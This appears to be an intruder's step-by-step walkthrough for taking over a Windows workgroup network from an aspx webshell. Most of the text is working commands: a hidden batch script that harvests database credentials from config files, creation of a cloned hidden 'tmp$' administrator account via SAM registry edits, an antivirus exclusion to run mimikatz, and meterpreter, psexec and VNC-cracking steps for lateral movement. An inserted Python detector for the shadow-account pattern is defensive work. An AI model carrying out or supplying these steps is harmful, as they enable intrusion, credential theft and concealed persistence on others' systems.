Inside network in workgroup


0x01 Base

Got an aspx webshell.  
Don't know how to get a system shell from this webshell.  
There is more than one site hosted here; another one was found at a different address.

0x02 Steps

1> Search web.config on all sites to find the sa account and its password

@echo off
goto :main
Comment (everything between goto :main and the :main label is skipped):
for /f "delims=" cancels the default splitting on spaces and similar characters.
dir /s does what find does on Linux; for /r path %%i in (web.conf?g) do ... can also act as find, but when I tried it the path in for /r path ... could only be one specific
:main
set str=c d e f g h i j k l m n o p q r s t u v w x y z
echo Current disk partitions:
for %%i in (%str%) do (
  if exist %%i:\ (
    echo %%i:
    for /f "delims=" %%j in ('dir /b /s %%i:\web.conf?g %%i:\global.a?a %%i:\wp-config.p?p %%i:\setting.p?p %%i:\database.p?p %%i:\config.p?p %%i:\config.ini.p?p %%i:\conn.p?p %%i:\connect.p?p %%i:\conn.a?p %%i:\conn.a?a') do (
      echo *****filepath***** >> tmp.txt
      echo %%j >> tmp.txt
      type "%%j" >> tmp.txt
      echo. >> tmp.txt
      echo ---------------------------- >> tmp.txt
      echo I am a pretty separator line >> tmp.txt
      echo ---------------------------- >> tmp.txt
      echo. >> tmp.txt
    )
  )
)

2.vbs (runs 1.bat in a hidden window):

Set ws = CreateObject("Wscript.Shell")
ws.Run "cmd /c 1.bat", vbHide

cscript 2.vbs
or download from:

[+] Found sa and sapass, but since this is an inside-network PC, 3389 is not reachable from outside

2> Upload a tunnel.aspx (from reGeorg) to

[python] -p 1080 -u

3> Use sa privileges in Chopper to execute:

net user tmp /add & net localgroup administrators tmp /add  
net localgroup "remote desktop users" tmp /add

4> runas admin -> cmd -> mstsc /console /v: -admin

[with tmp account]:  
Add a super-hidden administrator account cloned from the Administrator account:  
net user tmp$ /add & net localgroup administrators tmp$ /add
regedit -> local machine -> sam -> account -> name
export 0x111 (assumed to be Administrator's) as admin.reg
export 0x222 (assumed to be tmp$'s) as user.reg
export account -> name -> tmp$ as tmp.reg
copy the F value from admin.reg into user.reg
net user tmp$ /del
import tmp.reg and user.reg
delete admin.reg, user.reg and tmp.reg
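A defender's counterpart to the account-cloning steps above, added here as an example and not part of the original post: it scans Windows Security events (4720 account created, 4732 member added to a local group, 4726 account deleted) for the create, elevate, delete sequence and for `$`-suffixed names; the sample events and their field names are constructed.

```python
"""Detect the shadow-account pattern from step 4 in Windows Security events.

Sequence to look for: a local account whose name ends in "$" is created
(event 4720), added to Administrators (4732), then deleted (4726) a few
minutes later; the registry re-import that brings it back leaves no event.
"""
from datetime import datetime, timedelta

# Constructed sample events (not from the original post); fields mirror the
# Security log: the target user name and, for 4732, the group it was added to.
SAMPLE_EVENTS = [
    {"time": "2015-06-01T10:00:00", "id": 4720, "target": "tmp$", "group": None},
    {"time": "2015-06-01T10:00:05", "id": 4732, "target": "tmp$", "group": "Administrators"},
    {"time": "2015-06-01T10:02:00", "id": 4726, "target": "tmp$", "group": None},
    {"time": "2015-06-01T11:00:00", "id": 4720, "target": "svc_backup", "group": None},
    {"time": "2015-06-01T11:00:10", "id": 4732, "target": "svc_backup", "group": "Administrators"},
    {"time": "2015-06-02T09:00:00", "id": 4720, "target": "build$", "group": None},
]


def find_shadow_accounts(events, window=timedelta(minutes=30)):
    """Return {name: reasons} for accounts matching the shadow-account pattern.

    "cloned": created, made admin and deleted again within `window`.
    "dollar": admin account whose name ends in "$", which `net user` omits.
    """
    by_name = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        rec = by_name.setdefault(ev["target"], {})
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            rec["created"] = when
        elif ev["id"] == 4732 and (ev["group"] or "").lower() == "administrators":
            rec["admin"] = when
        elif ev["id"] == 4726:
            rec["deleted"] = when

    hits = {}
    for name, rec in by_name.items():
        reasons = []
        if {"created", "admin", "deleted"} <= set(rec) and rec["deleted"] - rec["created"] <= window:
            reasons.append("cloned")
        if name.endswith("$") and "admin" in rec:
            reasons.append("dollar")
        if reasons:
            hits[name] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in find_shadow_accounts(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(reasons)}")
```

Process-creation auditing (event 4688 with command lines) catches the same `net user ... /add` and `net localgroup administrators ... /add` commands directly, which makes a good second signal.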

[with tmp$ account]:  
net user tmp /del
open ESET's settings and add an excluded file path
copy \\tsclient\mimikatz\ to the excluded folder

[run mimikatz]:  

5>upload a meterpreter payload to

meterpreter>run get_local_subnets
(handler)>route add 1
(handler)>route print
(handler)>use auxiliary/scanner/portscan/tcp
set ports 25,110,21,80,8080,443,1433,3606,3389,5900
set rhosts
set threads 24

(handler)>use exploit/windows/smb/psexec
(handler)>set rhosts
(handler)>set username and password found earlier with sekurlsa::logonpasswords in mimikatz
or the password found by mimikatz inside msf:
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords
enter other PCs with the SMB password
use mimikatz to find morepassword
search regedit to find morevncpassword

search the winvnc password in
if the ini file holding the password was deleted, open regedit and search for "password"
find the vnc password
use the VNC cracker in Cain to crack it
get vncpassword
use auxiliary/scanner/vnc/vnc_login
set rhosts
set password vncpassword
enter other PCs with the vnc password
use mimikatz to find morepassword
search regedit to find morevncpassword

use morepassword in exploit/windows/smb/psexec
use morevncpassword in auxiliary/scanner/vnc/vnc_login

inside network, windows, aspx, workgroup